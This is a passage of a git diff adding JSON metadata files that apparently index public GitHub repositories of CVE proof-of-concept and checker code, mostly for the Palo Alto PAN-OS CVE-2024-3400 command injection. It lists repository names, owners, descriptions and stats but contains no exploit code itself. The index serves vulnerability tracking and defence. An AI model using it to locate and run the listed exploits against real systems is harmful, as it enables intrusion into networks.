"2024-08-20T21:27:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33722.json b/2024/CVE-2024-33722.json new file mode 100644 index 0000000000..246a974799 --- /dev/null +++ b/2024/CVE-2024-33722.json @@ -0,0 +1,33 @@ +[ + { + "id": 790393442, + "name": "soplanning-1.52-exploits", + "full_name": "fuzzlove\/soplanning-1.52-exploits", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/soplanning-1.52-exploits", + "description": "SOPlanning 1.52.00 CSRF\/SQLi\/XSS (CVE-2024-33722, CVE-2024-33724)", + "fork": false, + "created_at": "2024-04-22T19:51:18Z", + "updated_at": "2024-05-07T14:23:34Z", + "pushed_at": "2024-05-07T14:23:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33775.json b/2024/CVE-2024-33775.json new file mode 100644 index 0000000000..6f78d6e78b --- /dev/null +++ b/2024/CVE-2024-33775.json @@ -0,0 +1,33 @@ +[ + { + "id": 794619582, + "name": "CVE-2024-33775", + "full_name": "Neo-XeD\/CVE-2024-33775", + "owner": { + "login": "Neo-XeD", + "id": 168660736, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168660736?v=4", + "html_url": "https:\/\/github.com\/Neo-XeD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Neo-XeD\/CVE-2024-33775", + "description": null, + "fork": false, + "created_at": "2024-05-01T15:46:32Z", + "updated_at": "2024-05-01T16:42:27Z", + "pushed_at": "2024-05-01T16:38:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33883.json b/2024/CVE-2024-33883.json new file mode 100644 index 0000000000..9b55247a8b --- /dev/null +++ b/2024/CVE-2024-33883.json @@ -0,0 +1,37 @@ +[ + { + "id": 820074511, + "name": "PoC-CVE-2024-33883", + "full_name": "Grantzile\/PoC-CVE-2024-33883", + "owner": { + "login": "Grantzile", + "id": 88519798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88519798?v=4", + "html_url": "https:\/\/github.com\/Grantzile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grantzile\/PoC-CVE-2024-33883", + "description": "PoC of CVE-2024-33883, RCE vulnerability of ejs.", + "fork": false, + "created_at": "2024-06-25T18:40:31Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-07-06T19:51:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ejs", + "rce-exploit", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33901.json b/2024/CVE-2024-33901.json new file mode 100644 index 0000000000..efd27dc2fb --- /dev/null +++ b/2024/CVE-2024-33901.json @@ -0,0 +1,33 @@ +[ + { + "id": 893321019, + "name": "CVE-2024-33901-ProofOfConcept", + "full_name": "gmikisilva\/CVE-2024-33901-ProofOfConcept", + "owner": { + "login": "gmikisilva", + "id": 101853134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101853134?v=4", + "html_url": "https:\/\/github.com\/gmikisilva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmikisilva\/CVE-2024-33901-ProofOfConcept", + "description": "Short program that demonstrates the vulnerability CVE-2024-33901 in KeePassXC version 2.7.7", + "fork": false, + "created_at": "2024-11-24T05:43:27Z", + "updated_at": "2024-11-25T06:15:40Z", + "pushed_at": "2024-11-24T23:34:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-33911.json b/2024/CVE-2024-33911.json new file mode 100644 index 0000000000..a6cde5f6e8 --- /dev/null +++ b/2024/CVE-2024-33911.json @@ -0,0 +1,33 @@ +[ + { + "id": 796239614, + "name": "CVE-2024-33911", + "full_name": "xbz0n\/CVE-2024-33911", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-33911", + "description": null, + "fork": false, + "created_at": "2024-05-05T11:14:47Z", + "updated_at": "2024-05-20T09:31:52Z", + "pushed_at": "2024-05-05T11:23:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3400.json b/2024/CVE-2024-3400.json new file mode 100644 index 0000000000..c6576bb656 --- /dev/null +++ b/2024/CVE-2024-3400.json @@ -0,0 +1,1133 @@ +[ + { + "id": 785991655, + "name": "CVE-2024-3400", + "full_name": "Yuvvi01\/CVE-2024-3400", + "owner": { + "login": "Yuvvi01", + "id": 70095030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70095030?v=4", + "html_url": "https:\/\/github.com\/Yuvvi01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuvvi01\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-13T05:16:21Z", + "updated_at": "2024-07-17T13:47:53Z", + "pushed_at": "2024-04-13T05:20:15Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786090468, + "name": "CVE-2024-3400-PoC", + "full_name": "CerTusHack\/CVE-2024-3400-PoC", + "owner": { + "login": "CerTusHack", + "id": 92284780, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92284780?v=4", + "html_url": "https:\/\/github.com\/CerTusHack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CerTusHack\/CVE-2024-3400-PoC", + "description": null, + "fork": false, + "created_at": "2024-04-13T11:55:53Z", + "updated_at": "2024-04-20T15:20:03Z", + "pushed_at": "2024-04-13T20:51:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 786123425, + "name": "CVE-2024-3400", + "full_name": "0x0d3ad\/CVE-2024-3400", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2024-3400", + "description": "CVE-2024-3400", + "fork": false, + "created_at": "2024-04-13T14:00:31Z", + "updated_at": "2024-11-18T17:41:54Z", + "pushed_at": "2024-04-18T07:11:17Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 63, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 786201656, + "name": "CVE-2024-3400", + "full_name": "FoxyProxys\/CVE-2024-3400", + "owner": { + "login": "FoxyProxys", + "id": 166161106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4", + "html_url": "https:\/\/github.com\/FoxyProxys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:14:47Z", + "updated_at": "2024-04-16T13:04:58Z", + "pushed_at": "2024-04-16T13:04:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786473067, + "name": "CVE-2024-3400", + "full_name": "momika233\/CVE-2024-3400", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-14T15:16:16Z", + "updated_at": "2024-05-17T06:47:57Z", + "pushed_at": "2024-04-14T15:20:34Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 786540183, + "name": "CVE-2024-3400", + "full_name": "MrR0b0t19\/CVE-2024-3400", + "owner": { + "login": "MrR0b0t19", + "id": 63489501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4", + "html_url": "https:\/\/github.com\/MrR0b0t19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrR0b0t19\/CVE-2024-3400", + "description": "Vulnerabilidad de palo alto ", + "fork": false, + "created_at": "2024-04-14T19:11:16Z", + "updated_at": "2024-04-15T20:17:12Z", + "pushed_at": "2024-04-14T19:23:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786651484, + "name": "CVE-2024-3400-Compromise-Checker", + "full_name": "MurrayR0123\/CVE-2024-3400-Compromise-Checker", + "owner": { + "login": "MurrayR0123", + "id": 98131196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98131196?v=4", + "html_url": "https:\/\/github.com\/MurrayR0123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MurrayR0123\/CVE-2024-3400-Compromise-Checker", + "description": "A simple bash script to check for evidence of compromise related to CVE-2024-3400", + "fork": false, + "created_at": "2024-04-15T03:28:22Z", + "updated_at": "2024-04-26T06:02:36Z", + "pushed_at": "2024-04-26T06:02:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 787153640, + "name": "CVE-2024-3400", + "full_name": "AdaniKamal\/CVE-2024-3400", + "owner": { + "login": "AdaniKamal", + "id": 44063862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44063862?v=4", + "html_url": "https:\/\/github.com\/AdaniKamal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdaniKamal\/CVE-2024-3400", + "description": "CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect", + "fork": false, + "created_at": "2024-04-16T01:43:24Z", + "updated_at": "2024-08-25T03:20:25Z", + "pushed_at": "2024-08-25T03:20:22Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787259719, + "name": "CVE-2024-3400-", + "full_name": "LoanVitor\/CVE-2024-3400-", + "owner": { + "login": "LoanVitor", + "id": 100142681, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100142681?v=4", + "html_url": "https:\/\/github.com\/LoanVitor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LoanVitor\/CVE-2024-3400-", + "description": null, + "fork": false, + "created_at": "2024-04-16T07:31:22Z", + "updated_at": "2024-04-16T17:18:12Z", + "pushed_at": "2024-04-16T07:41:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 787437309, + "name": "CVE-2024-3400", + "full_name": "h4x0r-dz\/CVE-2024-3400", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400", + "description": "CVE-2024-3400 Palo Alto OS Command Injection", + "fork": false, + "created_at": "2024-04-16T14:18:08Z", + "updated_at": "2024-11-21T05:25:01Z", + "pushed_at": "2024-04-16T22:35:43Z", + "stargazers_count": 150, + "watchers_count": 150, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 150, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787493956, + "name": "CVE-2024-3400-RCE-Scan", + "full_name": "W01fh4cker\/CVE-2024-3400-RCE-Scan", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-3400-RCE-Scan", + "description": "CVE-2024-3400-RCE", + "fork": false, + "created_at": "2024-04-16T16:18:56Z", + "updated_at": "2024-11-07T10:01:55Z", + "pushed_at": "2024-04-22T08:50:27Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 85, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 787515205, + "name": "CVE-2024-3400-POC", + "full_name": "CONDITIONBLACK\/CVE-2024-3400-POC", + "owner": { + "login": "CONDITIONBLACK", + "id": 6516181, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516181?v=4", + "html_url": "https:\/\/github.com\/CONDITIONBLACK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CONDITIONBLACK\/CVE-2024-3400-POC", + "description": null, + "fork": false, + "created_at": "2024-04-16T17:08:15Z", + "updated_at": "2024-04-16T22:03:41Z", + "pushed_at": "2024-04-16T17:18:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 787613969, + "name": "CVE-2024-3400", + "full_name": "Chocapikk\/CVE-2024-3400", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-16T21:21:41Z", + "updated_at": "2024-11-08T09:41:35Z", + "pushed_at": "2024-04-17T21:04:22Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787614808, + "name": "CVE-2024-3400", + "full_name": "ihebski\/CVE-2024-3400", + "owner": { + "login": "ihebski", + "id": 13177580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13177580?v=4", + "html_url": "https:\/\/github.com\/ihebski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ihebski\/CVE-2024-3400", + "description": "CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect", + "fork": false, + "created_at": "2024-04-16T21:24:15Z", + "updated_at": "2024-11-14T09:06:40Z", + "pushed_at": "2024-04-17T11:03:32Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 787738421, + "name": "CVE-2024-3400-Checker", + "full_name": "index2014\/CVE-2024-3400-Checker", + "owner": { + "login": "index2014", + "id": 44129868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44129868?v=4", + "html_url": "https:\/\/github.com\/index2014", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/index2014\/CVE-2024-3400-Checker", + "description": "A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability. Palo Alto 防火墙 PAN-OS 远程命令注入检测程序。", + "fork": false, + "created_at": "2024-04-17T04:58:42Z", + "updated_at": "2024-04-17T05:56:31Z", + "pushed_at": "2024-04-17T05:57:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787894337, + "name": "CVE-2024-3400-Canary", + "full_name": "ZephrFish\/CVE-2024-3400-Canary", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2024-3400-Canary", + "description": "Have we not learnt from HoneyPoC?", + "fork": false, + "created_at": "2024-04-17T11:41:01Z", + "updated_at": "2024-06-10T05:08:26Z", + "pushed_at": "2024-04-17T12:04:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 788013743, + "name": "CVE-2024-3400", + "full_name": "ak1t4\/CVE-2024-3400", + "owner": { + "login": "ak1t4", + "id": 10950567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10950567?v=4", + "html_url": "https:\/\/github.com\/ak1t4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ak1t4\/CVE-2024-3400", + "description": "Global Protec Palo Alto File Write Exploit", + "fork": false, + "created_at": "2024-04-17T16:01:20Z", + "updated_at": "2024-09-18T22:47:58Z", + "pushed_at": "2024-04-17T19:46:15Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788161583, + "name": "CVE-2024-3400", + "full_name": "retkoussa\/CVE-2024-3400", + "owner": { + "login": "retkoussa", + "id": 128074431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128074431?v=4", + "html_url": "https:\/\/github.com\/retkoussa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/retkoussa\/CVE-2024-3400", + "description": "CVE-2024-3400 : Palo Alto OS Command Injection - POC", + "fork": false, + "created_at": "2024-04-17T22:28:10Z", + "updated_at": "2024-11-12T13:55:11Z", + "pushed_at": "2024-04-17T23:46:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788388835, + "name": "CVE-2024-3400", + "full_name": "schooldropout1337\/CVE-2024-3400", + "owner": { + "login": "schooldropout1337", + "id": 134079876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134079876?v=4", + "html_url": "https:\/\/github.com\/schooldropout1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/schooldropout1337\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-18T10:16:22Z", + "updated_at": "2024-10-22T07:09:25Z", + "pushed_at": "2024-04-22T05:06:51Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788514206, + "name": "CVE-2024-3400", + "full_name": "hahasagined\/CVE-2024-3400", + "owner": { + "login": "hahasagined", + "id": 3049408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3049408?v=4", + "html_url": "https:\/\/github.com\/hahasagined", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hahasagined\/CVE-2024-3400", + "description": "EDL for IPs attacking customers with CVE-2024-3400 ", + "fork": false, + "created_at": "2024-04-18T15:06:03Z", + "updated_at": "2024-04-18T15:06:03Z", + "pushed_at": "2024-04-18T15:13:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788553953, + "name": "CVE-2024-3400", + "full_name": "codeblueprint\/CVE-2024-3400", + "owner": { + "login": "codeblueprint", + "id": 212233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/212233?v=4", + "html_url": "https:\/\/github.com\/codeblueprint", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codeblueprint\/CVE-2024-3400", + "description": "Simple Python code to check for arbitrary uploading for PaloAlto CVE-2024-3400", + "fork": false, + "created_at": "2024-04-18T16:35:29Z", + "updated_at": "2024-04-18T20:15:20Z", + "pushed_at": "2024-04-19T12:14:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788558935, + "name": "CVE-2024-3400", + "full_name": "swaybs\/CVE-2024-3400", + "owner": { + "login": "swaybs", + "id": 37590406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37590406?v=4", + "html_url": "https:\/\/github.com\/swaybs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swaybs\/CVE-2024-3400", + "description": "Python script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts", + "fork": false, + "created_at": "2024-04-18T16:45:51Z", + "updated_at": "2024-08-02T15:51:45Z", + "pushed_at": "2024-04-18T18:06:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3400", + "palo-alto", + "palo-alto-firewalls", + "palo-alto-networks", + "paloaltonetworks", + "python", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788665827, + "name": "CVE-2024-3400-Check", + "full_name": "sxyrxyy\/CVE-2024-3400-Check", + "owner": { + "login": "sxyrxyy", + "id": 125439203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4", + "html_url": "https:\/\/github.com\/sxyrxyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxyrxyy\/CVE-2024-3400-Check", + "description": null, + "fork": false, + "created_at": "2024-04-18T21:12:49Z", + "updated_at": "2024-04-18T21:13:17Z", + "pushed_at": "2024-04-18T22:56:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788666276, + "name": "CVE-2024-3400", + "full_name": "Ravaan21\/CVE-2024-3400", + "owner": { + "login": "Ravaan21", + "id": 48627542, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48627542?v=4", + "html_url": "https:\/\/github.com\/Ravaan21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ravaan21\/CVE-2024-3400", + "description": "CVE-2024-3400 POC written in Rust and Python", + "fork": false, + "created_at": "2024-04-18T21:14:15Z", + "updated_at": "2024-04-18T21:16:31Z", + "pushed_at": "2024-04-18T21:21:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788680382, + "name": "cve-2024-3400-poc", + "full_name": "tfrederick74656\/cve-2024-3400-poc", + "owner": { + "login": "tfrederick74656", + "id": 3392399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3392399?v=4", + "html_url": "https:\/\/github.com\/tfrederick74656", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tfrederick74656\/cve-2024-3400-poc", + "description": "Simple POC for CVE-2024-3400", + "fork": false, + "created_at": "2024-04-18T22:01:16Z", + "updated_at": "2024-04-18T22:01:16Z", + "pushed_at": "2024-04-17T21:06:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 788820989, + "name": "CVE-2024-3400", + "full_name": "pwnj0hn\/CVE-2024-3400", + "owner": { + "login": "pwnj0hn", + "id": 29369899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29369899?v=4", + "html_url": "https:\/\/github.com\/pwnj0hn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwnj0hn\/CVE-2024-3400", + "description": "Finding Palo Alto devices vulnerable to CVE-2024-3400.", + "fork": false, + "created_at": "2024-04-19T06:37:32Z", + "updated_at": "2024-04-19T06:38:46Z", + "pushed_at": "2024-04-19T06:39:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789024043, + "name": "panrapidcheck", + "full_name": "HackingLZ\/panrapidcheck", + "owner": { + "login": "HackingLZ", + "id": 3459847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3459847?v=4", + "html_url": "https:\/\/github.com\/HackingLZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HackingLZ\/panrapidcheck", + "description": "Extract useful information from PANOS support file for CVE-2024-3400", + "fork": false, + "created_at": "2024-04-19T14:56:17Z", + "updated_at": "2024-04-20T08:23:35Z", + "pushed_at": "2024-04-19T20:06:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789741548, + "name": "cve-2024-3400", + "full_name": "Kr0ff\/cve-2024-3400", + "owner": { + "login": "Kr0ff", + "id": 35173514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35173514?v=4", + "html_url": "https:\/\/github.com\/Kr0ff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kr0ff\/cve-2024-3400", + "description": "Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation", + "fork": false, + "created_at": "2024-04-21T12:38:13Z", + "updated_at": "2024-04-21T12:41:00Z", + "pushed_at": "2024-04-21T12:40:57Z", + "stargazers_count": 0, + 